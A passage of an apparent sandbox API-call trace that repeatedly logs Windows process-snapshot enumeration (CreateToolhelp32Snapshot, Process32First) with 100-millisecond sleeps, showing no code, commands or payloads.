th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.783] Sleep (dwMilliseconds=0x64) [0262.789] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0262.801] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.871] Sleep (dwMilliseconds=0x64) [0262.877] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0262.891] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.023] Sleep (dwMilliseconds=0x64) [0263.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0263.054] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.122] Sleep (dwMilliseconds=0x64) [0263.126] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0263.139] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.252] Sleep (dwMilliseconds=0x64) [0263.255] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0263.268] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.394] Sleep (dwMilliseconds=0x64) [0263.398] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0263.418] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.521] Sleep (dwMilliseconds=0x64) [0263.525] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0263.541] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.632] Sleep (dwMilliseconds=0x64) [0263.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0263.655] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.745] Sleep (dwMilliseconds=0x64) [0263.749] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0263.768] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.854] Sleep (dwMilliseconds=0x64) [0263.856] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0263.868] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0263.960] Sleep (dwMilliseconds=0x64) [0263.962] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0263.978] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.069] Sleep (dwMilliseconds=0x64) [0264.071] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0264.085] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.192] Sleep (dwMilliseconds=0x64) [0264.197] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0264.216] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.301] Sleep (dwMilliseconds=0x64) [0264.305] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0264.320] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.422] Sleep (dwMilliseconds=0x64) [0264.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0264.441] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.539] Sleep (dwMilliseconds=0x64) [0264.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0264.562] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.649] Sleep (dwMilliseconds=0x64) [0264.680] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0264.722] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.815] Sleep (dwMilliseconds=0x64) [0264.820] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0264.839] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.953] Sleep (dwMilliseconds=0x64) [0264.957] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0264.973] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.102] Sleep (dwMilliseconds=0x64) [0265.106] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0265.127] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.235] Sleep (dwMilliseconds=0x64) [0265.239] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0265.253] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.339] Sleep (dwMilliseconds=0x64) [0265.342] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0265.354] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.426] Sleep (dwMilliseconds=0x64) [0265.434] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0265.452] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.520] Sleep (dwMilliseconds=0x64) [0265.525] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0265.539] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.616] Sleep (dwMilliseconds=0x64) [0265.619] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0265.631] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.709] Sleep (dwMilliseconds=0x64) [0265.712] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0265.727] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.827] Sleep (dwMilliseconds=0x64) [0265.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0265.847] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0265.949] Sleep (dwMilliseconds=0x64) [0265.957] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0265.971] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.061] Sleep (dwMilliseconds=0x64) [0266.068] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2060 [0266.089] Process32First (in: hSnapshot=0x2060, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.199] Sleep (dwMilliseconds=0x64) [0266.203] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x232c [0266.219] Process32First (in: hSnapshot=0x232c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.300] Sleep (dwMilliseconds=0x64) [0266.302] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0266.403] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.618] Sleep (dwMilliseconds=0x64) [0266.659] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0266.710] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.824] Sleep (dwMilliseconds=0x64) [0266.827] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0266.839] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0266.916] Sleep (dwMilliseconds=0x64) [0266.920] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0266.936] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.033] Sleep (dwMilliseconds=0x64) [0267.060] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0267.081] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.227] Sleep (dwMilliseconds=0x64) [0267.237] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0267.252] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.375] Sleep (dwMilliseconds=0x64) [0267.378] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0267.398] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.480] Sleep (dwMilliseconds=0x64) [0267.484] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0267.497] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.594] Sleep (dwMilliseconds=0x64) [0267.599] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0267.625] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.811] Sleep (dwMilliseconds=0x64) [0267.816] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0267.828] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.904] Sleep (dwMilliseconds=0x64) [0267.910] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0267.925] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.003] Sleep (dwMilliseconds=0x64) [0268.006] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0268.018] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.113] Sleep (dwMilliseconds=0x64) [0268.120] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0268.134] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.256] Sleep (dwMilliseconds=0x64) [0268.274] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0268.289] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.377] Sleep (dwMilliseconds=0x64) [0268.379] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0268.392] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.473] Sleep (dwMilliseconds=0x64) [0268.479] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0268.492] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.564] Sleep (dwMilliseconds=0x64) [0268.567] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0268.583] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.652] Sleep (dwMilliseconds=0x64) [0268.657] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0268.670] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.740] Sleep (dwMilliseconds=0x64) [0268.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0268.756] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.830] Sleep (dwMilliseconds=0x64) [0268.834] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0268.848] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.009] Sleep (dwMilliseconds=0x64) [0269.012] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0269.028] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.130] Sleep (dwMilliseconds=0x64) [0269.134] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0269.148] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.270] Sleep (dwMilliseconds=0x64) [0269.273] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0269.291] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.402] Sleep (dwMilliseconds=0x64) [0269.406] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0269.421] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.491] Sleep (dwMilliseconds=0x64) [0269.494] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0269.508] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.575] Sleep (dwMilliseconds=0x64) [0269.580] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0269.597] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.697] Sleep (dwMilliseconds=0x64) [0269.701] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0269.722] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.818] Sleep (dwMilliseconds=0x64) [0269.821] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0269.839] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.937] Sleep (dwMilliseconds=0x64) [0269.940] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x10e8 [0269.960] Process32First (in: hSnapshot=0x10e8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.108] Sleep (dwMilliseconds=0x64) [0270.114] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x141c [0270.127] Process32First (in: hSnapshot=0x141c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0270.215] Sleep (dwMilliseconds=0x64) [0270.219] CreateToolhelp32Snapshot 